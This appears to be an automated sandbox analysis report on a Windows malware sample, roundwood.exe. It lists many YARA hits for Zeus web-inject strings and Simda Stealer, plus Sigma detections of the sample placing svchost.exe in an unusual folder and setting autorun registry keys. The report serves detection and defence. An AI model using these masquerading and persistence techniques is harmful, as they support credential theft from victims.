34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.27f2000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.88e000.4.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.3.svchost.exe.88e000.4.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2b32000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.2.roundwood.exe.406400.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.40.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3c20000.8.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.20.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.13.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2cd0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2b32000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2762000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.893000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
2.2.svchost.exe.2d63c00.6.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.27.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.38.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.29.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2ac0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.29f2000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.30.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.2dc0000.43.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.28c2000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.29.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.2.svchost.exe.407000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.34.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2c90000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2ac0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.37.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.88e000.2.raw.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
2.3.svchost.exe.88e000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1452000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2412000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.16.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e70000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2d00000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.2.svchost.exe.407000.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.35.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.893c00.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2762000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1242000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.27f2000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.15.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
0.2.roundwood.exe.400000.0.unpack	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
0.2.roundwood.exe.400000.0.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.12.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.893000.5.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48410:$a1: name=%s&port=%u 0x47ba8:$a2: data_inject 0x47d98:$a3: keylog.txt 0x47a3d:$a4: User-agent: %s]]] 0x48564:$a5: %s\%02d.bmp
25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.8e2000.1.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.dd2000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.23.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.31.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.26.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.3.roundwood.exe.6bf318.0.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.25d0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2cd0000.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.19.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.11.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e30000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.33.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.10.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.15.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
2.3.svchost.exe.3c20000.8.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0.2.roundwood.exe.406400.1.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49810:$a1: name=%s&port=%u 0x48fa8:$a2: data_inject 0x49198:$a3: keylog.txt 0x48e3d:$a4: User-agent: %s]]] 0x49964:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.34.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.893c00.3.raw.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1412000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.26.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.88e000.4.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4d410:$a1: name=%s&port=%u 0x4cba8:$a2: data_inject 0x4cd98:$a3: keylog.txt 0x4ca3d:$a4: User-agent: %s]]] 0x4d564:$a5: %s\%02d.bmp
4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.12e0000.3.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
2.3.svchost.exe.3a40000.30.unpack	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x47a10:$a1: name=%s&port=%u 0x471a8:$a2: data_inject 0x47398:$a3: keylog.txt 0x4703d:$a4: User-agent: %s]]] 0x47b64:$a5: %s\%02d.bmp
Click to see the 167 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\roundwood.exe, ProcessId: 5852, TargetFilename: C:\Windows\apppatch\svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\roundwood.exe", ParentImage: C:\Users\user\Desktop\roundwood.exe, ParentProcessId: 5852, ParentProcessName: roundwood.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 5284, ProcessName: svchost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\apppatch\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe, ProcessId: 4268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\userinit

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

